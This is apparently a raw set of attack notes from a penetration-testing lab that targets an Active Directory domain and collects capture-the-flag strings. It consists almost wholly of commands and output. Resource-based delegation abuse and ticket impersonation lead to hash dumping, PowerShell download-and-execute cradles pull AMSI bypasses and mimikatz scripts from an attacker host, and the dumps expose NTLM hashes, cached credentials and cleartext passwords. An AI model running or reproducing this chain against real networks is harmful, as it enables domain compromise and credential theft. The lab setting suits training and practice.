xz5+FpY7eEQK3R0MS69WuznlWl/beJasQZ7DV0H46dpKd4T4Qnz8n77pdArX6vabpVGv+qbDqUYx5EWecJUPpyodjYEK5BhzSnrhY6KvhUU3hkafpakvOkPPQHBhibshNMTbsEsdyFUmndUquWsSDGbAnUHvsxM37REHRqqh7STjc0hgc2S+z9Jv5FlyUk3p3ZNyBB9oi34m4okWpR+nPqs66BWqaR22uG45ArXd9GSQ4M59c1LvT0YH7/jni8co5J2c04e9/t0iZ7rWUErcFQen6F7w+xXKJ+egH05Nbta8jVegNfQxxPlWJZ3TJ3hr2lP7ZUxS5SusfuSSJcvSc5asftHW1lLEJHy/v8ClzyXbSPMbzNh2tjQKuw4H5gA+LtSGwhg0N3QqkYHmuDs0uIEQFxmmHrngG+h/MVmh8ZHtbT4xDNvN1L8wR3K7d018b4rtyDGgWJQ8Kre2ZPVYSfm+tVoPFEUsD6OB3DCB2aADAgEAooHRBIHOfYHLMIHIoIHFMIHCMIG/oCswKaADAgESoSIEIN5eNdPcZOcj8wIcQKkKc6a3i9Bgn0/r9nPjvdpY6r6boQsbCU0zQy5MT0NBTKIUMBKgAwIBAaELMAkbB3N2Y19zcWyjBwMFAEDhAAClERgPMjAyNDAyMDkwMTAwMDFaphEYDzIwMjQwMjA5MTEwMDAxWqcRGA8yMDI0MDIxNjAxMDAwMVqoCxsJTTNDLkxPQ0FMqR4wHKADAgECoRUwExsGa3JidGd0GwlNM0MuTE9DQUw= /nowrap /ptt
┌──(myimpacket)─(jay㉿localhost)-[~/prolabs/RubeusToCcache]
└─$ rbcd.py -delegate-from 'COREWKT001$' -delegate-to 'COREWKT002$' -action 'write' 'core.cyber.local/ilene.rasch' -k -no-pass
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] COREWKT001$ can now impersonate users on COREWKT002$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*] corewkt001$ (S-1-5-21-1559563558-3652093953-1250159885-1396)
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/rub.ps1");
Invoke-Rubeus -Command 'tgtdeleg /service:krbtgt /nowrap'
./rubeustoccache.py doIFQDCCBTygAwIBBaEDAgEWooIENjCCBDJhggQuMIIEKqADAgEFoRIbEENPUkUuQ1lCRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZrcmJ0Z3QbEENPUkUuQ1lCRVIuTE9DQUyjggPmMIID4qADAgESoQMCAQWiggPUBIID0EVlP3QA75j2WjTUU3XlY3ymXBToBHe9y4aRj95tNfQ00VR9Kut4nEBXjUkFIQKcKhEuJU5HPEYaC9WDDWdi7OgqmRTAxguyFqaiPse5sSspZt0p+bg+gxsMNi9h85obOlL+s6ASGFjapsuuP/5eYEyk2JH0PGb9dt9h1uwun6wb3juP1/0kKePT5n7QeDlZqiFPJzg8hOqESiN2sRfQJp43ul4ih0sRpZCZ02m51zIybmT6N1zrwMHEpv0O+tAJ50ykTYQa0RdB21/6+xxiBrjqiTD454ZmFsHYqaPxomcEATL5ypGa80lHYiUOxpG+IB4x/C2vDsGKXUlXv8ykGjOiBQDFyVGuUx73lNG80VMX5DzVD2iBMsy61vIFwpl9Y1XBNspWwwWABjN8Ybw1dYuQfQ7MwuWviudBGaC4vgV8BK2e/55JEqkh+udQjzmFeBNOMeDJV5exCN7EkTJ1YnpGKK4thgAyDYMS4387qnzqzZuF0/OYLErXd9Q25r2ML8w505xVeTTuTHHQkRdoLYhZhkfIlEAFphYIk0CbgshiAmorI8pq6Eg0wDJfN3XVf+n6xpkv/0kS8ZQiSgETdSsAgYKM0bWufUZZItC515wW8kAOjebGHdhfMqBV6t6drGXnDDcokBICOJnWC8CUIeDnzBT1G3Qfx/R4mpmXmdynBqxgwUcl5ivbdklqg6soR28Hjv6vxhb3M4aXeSa4Ti9anQiBrfEwuDa+ZprPfqtBHpoz2OJ7L9pYEp2P4JEYZrLhJMLOkcXH35kGVY8L7ZMmgyCizhmGvs5fCC0l/Y0PsKAdI/prGxrfnwCmbUH8g6p9nu2wJlFWVhAvbcyuNvrRIdQd3IEAS9S3CeWN2Gk33BP6rlIOQ5gvR3sdQQrurcqlv/+fbZezkGc7Bp8Qufh9MTaLWiDarSaSsVzcz8A7wAVvGiO4gzQ4AkJqPHMvjhmigKzBqWbNgfxXEKDE6fnwBksjHMoNVSHqmh92e7k0gLg6Uj+66U/z2gDEGaRsAAMAzZHFeu40LApkmHvPYYSsZGN7yHyDt86TpJ2xypL/+a52fgcTkxQTteyZjcMJ/So3eBc8Kwz7t+IB/GYo5Nr1ZoBJcXk0L3XH91RtFmsICHYp6laz8Qh/5j8r9xRQYbJrTlkn2wbZnRc6JmkpQy5/wiZNd6qTJgrsuqmOisrbSpIMWvYl0pwO7xfNDYQXTSNAhTFA7ruCaNrK8ECerMqvGxEwgHR+4WWHLIyB1HbD5rewJ0L3nkgBYFUVE6cXgZdp07ha8R5h/PXOem8EI8mjgfUwgfKgAwIBAKKB6gSB532B5DCB4aCB3jCB2zCB2KArMCmgAwIBEqEiBCA+qYk0BwUHvGIZ+Td9GDT+VDX+8/p/2didWM8uJealyqESGxBDT1JFLkNZQkVSLkxPQ0FMohgwFqADAgEBoQ8wDRsLY29yZXdrdDAwMSSjBwMFAGChAAClERgPMjAyNDAzMDIwMDE5MThaphEYDzIwMjQwMzAyMTAxNTM3WqcRGA8yMDI0MDMwODE0MzAzOFqoEhsQQ09SRS5DWUJFUi5MT0NBTKklMCOgAwIBAqEcMBobBmtyYnRndBsQQ09SRS5DWUJFUi5MT0NBTA== corewkt001.kribi corewkt001.ccache
export KRB5CCNAME=corewkt001.ccache
getST.py -spn 'cifs/COREWKT002' -impersonate 'Administrator' 'core.cyber.local/COREWKT001$' -k -no-pass```
export KRB5CCNAME=Administrator.ccache
cme smb '10.9.15.201' -u Administrator --use-kcache --sam
SMB 10.9.15.201 445 COREWKT002 [*] Dumping SAM hashes
SMB 10.9.15.201 445 COREWKT002 Administrator:500:aad3b435b51404eeaad3b435b51404ee:3d369b6024558b73ce74c305f24ac984:::
SMB 10.9.15.201 445 COREWKT002 Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.15.201 445 COREWKT002 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 10.9.15.201 445 COREWKT002 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:954fd25162ffdda445dca6edec93b934:::
SMB 10.9.15.201 445 COREWKT002 [+] Added 4 SAM hashes to the database
Worked
cme smb '10.9.15.201' -u Administrator --use-kcache -x "powershell.exe -noexit -ep bypass -c IEX((New-Object System.Net.WebClient).DownloadString('http://10.10.15.207/large1.ps1'))"
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX

getsystem
Administrator:500:Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Guest:501:Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
DefaultAccount:503:DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
WDAGUtilityAccount:504:WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::::
Not again steven
Cyb3rN3t1C5{CR3@t0rS!D}
Post-exp
iex (new-object net.webclient).downloadstring("http://10.10.15.207/amsi"); iex (new-object net.webclient).downloadstring("http://10.10.15.207/test3.ps1");
test-wave -Command '"token::elevate" "privilege::debug" "lsadump::secrets"'
mimikatz(powershell) # lsadump::secrets
Domain : COREWKT002
SysKey : 5dd8c2773925b89651e9f48ebdf8d46c
Local name : COREWKT002 ( S-1-5-21-2266124114-256719172-1478668774 )
Domain name : core ( S-1-5-21-1559563558-3652093953-1250159885 )
Domain FQDN : core.cyber.local
Policy subsystem is : 1.18
LSA Key(s) : 1, default {d41a4f61-828e-cd3f-4165-8f0a0473a25e}
[00] {d41a4f61-828e-cd3f-4165-8f0a0473a25e} c5f66ce25a07afd2155b7692bb7751266906233b3e1d3e674154dd9d580d0347
Secret : $MACHINE.ACC
cur/text: 0DlRYa42*7Ao)_#=FiBaj#NMD0M5;TUSB,h#[:]nk,+a/u=eTVex"Kmn"WTz0d*,l"r9wetIka%lej(6jSWbJJu*VlhJW[bCX .T^/a;WxB9D;^9HbQgu^wn
NTLM:99f7ed190a27e3963249b3e0e14c3194
SHA1:69bd6440eb8dc905ffd4f6c382968f284489e787
old/text: 0DlRYa42*7Ao)_#=FiBaj#NMD0M5;TUSB,h#[:]nk,+a/u=eTVex"Kmn"WTz0d*,l"r9wetIka%lej(6jSWbJJu*VlhJW[bCX .T^/a;WxB9D;^9HbQgu^wn
NTLM:99f7ed190a27e3963249b3e0e14c3194
SHA1:69bd6440eb8dc905ffd4f6c382968f284489e787
Secret : CachedDefaultPassword
old/text: 6IVx7cxECM6m57WVjrqfH1gvluKnvN
Secret : DefaultPassword
cur/text: zui4uaS8oeng
test-wave -Command '"token::elevate" "privilege::debug" "lsadump::sam"'
mimikatz(powershell) # lsadump::sam
Domain : COREWKT002
SysKey : 5dd8c2773925b89651e9f48ebdf8d46c
Local SID : S-1-5-21-2266124114-256719172-1478668774
SAMKey : bd2bb9c4a2aff5c6874f16c8ef83fcd7
RID : 000001f4 (500)
User : Administrator
Hash NTLM: 3d369b6024558b73ce74c305f24ac984
Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
Random Value : 81c53c6ef5fbebe3e9cb1324ed9d6aa4
* Primary:Kerberos-Newer-Keys *
Default Salt : COREWKT002.CORE.CYBER.LOCALAdministrator
Default Iterations : 4096
Credentials
aes256_hmac (4096) : 001ff6d7bc10726a07cda615785fd4ec7f9b88d2f642539863ca823e99c1cd75
aes128_hmac (4096) : 12b60ce38236dece8e6abe1726085fd4
des_cbc_md5 (4096) : b53bfb687acebaf4
OldCredentials
aes256_hmac (4096) : c168b8fa882a3ed251a468998cca52994124a40117fbe5c1196c6754e47bbf10
aes128_hmac (4096) : 4c062b8eeb24fcfeec7c43fa1b8c81a0
des_cbc_md5 (4096) : 6ddf08ab1340926b
OlderCredentials
aes256_hmac (4096) : 6e5bcdb4a3141e96a94987367aef6166233bd9b146896e0b77c26e5c190496b2
aes128_hmac (4096) : bdf73a8d963578dd5431e955067439e3
des_cbc_md5 (4096) : 802962c21f51cdc7
* Packages *
NTLM-Strong-NTOWF
* Primary:Kerberos *
Default Salt : COREWKT002.CORE.CYBER.LOCALAdministrator
Credentials
des_cbc_md5 : b53bfb687acebaf4
OldCredentials
des_cbc_md5 : 6ddf08ab1340926b
test-wave -Command '"token::elevate" "privilege::debug" "sekurlsa::logonpasswords"'
After checking all the ip the interesting one
cme smb 10.9.10.18 -u 'steven.sanchez' -p 'zui4uaS8oeng' -d core.cyber.local
smbclient.py 'core.cyber.local/steven.sanchez:zui4uaS8oeng@10.9.10.18'
use C$
cd Users
# cat flag.txt
Cyb3rN3t1C5{RD$_U$3r_$h3ll}
THe Great Escape
cd Users\Administrator
cat flag.txt
Cyb3rN3t1C5{RD$_App$_Br3ak0ut$}
Out of Control
secretsdump.py 'core.cyber.local/steven.sanchez:zui4uaS8oeng@10.9.10.18'
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x0532f61bcad8090e9a8d4600fb26d83b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2567ea2192cc2288bebe0f13565252b8:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:86326d3ce61a1321d2dbcfdf8a068073:::
[*] Dumping cached domain logon information (domain/username:hash)
CYBER.LOCAL/Administrator:$DCC2$10240#Administrator#c145dcbd844f88264bdd35aafd17500f
CORE.CYBER.LOCAL/George.Wirth:$DCC2$10240#George.Wirth#b4357cc36acd90e5bdc6a185b0ad9289
CORE.CYBER.LOCAL/Steven.Sanchez:$DCC2$10240#Steven.Sanchez#25f4b45a2fb7112ce6cd5d12dccabbc4
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CYBER\CYAPP$:aes256-cts-hmac-sha1-96:2db070d2cbde140fdc612b267727c96ee0fc1b6e0ee2bf7aa13afbfd0af60d24
CYBER\CYAPP$:aes128-cts-hmac-sha1-96:2c9c0d26bae1353572ccd887bed4ec0a
CYBER\CYAPP$:des-cbc-md5:97d5f41f700e43c1
CYBER\CYAPP$:plain_password_hex:24003b00370023006b0038005d002e0065003a006f005b0041005800320056006e0073004b007000330027003c004e0042005a006400430020002e0040007500530030007100510062006900670048002d0075003c006a0024006d002000790075002c007a0032002a005f0024005d003200780059006800770048006a0058005200700053005b004100620030003a005b00560044007a006b0046004100660058006e00420058005000230034007300470071006100780040006300410047002000530020006100540031004300490043002000490044004a0069003e0042005d00380056006b00490037005a002200
CYBER\CYAPP$:aad3b435b51404eeaad3b435b51404ee:f787cd99b54ab0d05cbba3624199abd0:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x8913f82198236b0a6e4e6bcdb8893c178ea75e8e
dpapi_userkey:0xb6cfc82ef9a565ec90399c92a31caf6303d41ac2
[*] NL$KM
0000 5C 28 CD 7A 10 67 40 04 8F 19 94 8A 2A EE 9C 0A \(.z.g@.....*...
0010 8D F2 A8 E2 C7 4F 32 3D 3F 07 5A 25 05 7F C9 6B .....O2=?.Z%...k
0020 E8 90 54 60 E3 92 DC D5 70 E6 5E 3F C4 9B 0B DE ..T`....p.^?....
0030 15 EB 47 0B E0 01 86 8C 64 D5 22 09 38 27 5A 49 ..G.....d.".8'ZI
NL$KM:5c28cd7a106740048f19948a2aee9c0a8df2a8e2c74f323d3f075a25057fc96be8905460e392dcd570e65e3fc49b0bde15eb470be001868c64d5220938275a49
[*] Cleaning up...
[*] Stopping service RemoteRegistry
Corewebtw
cme winrm 10.9.15.0/24 -u 'steven.sanchez' -p 'zui4uaS8oeng'
evil-winrm -i 10.9.15.12 -u 'steven.sanchez' -p 'zui4uaS8oeng'
(New-Object System.Net.WebClient).DownloadString('http://10.10.15.207:80/am.txt') | IEX


<user username="tomcat" password="y4mEcAmk!%9j" roles="manager-gui" />
Now the tomcat exploit with juicy potato to get the curiosity flag in C:\Users\Administrator\flag.txt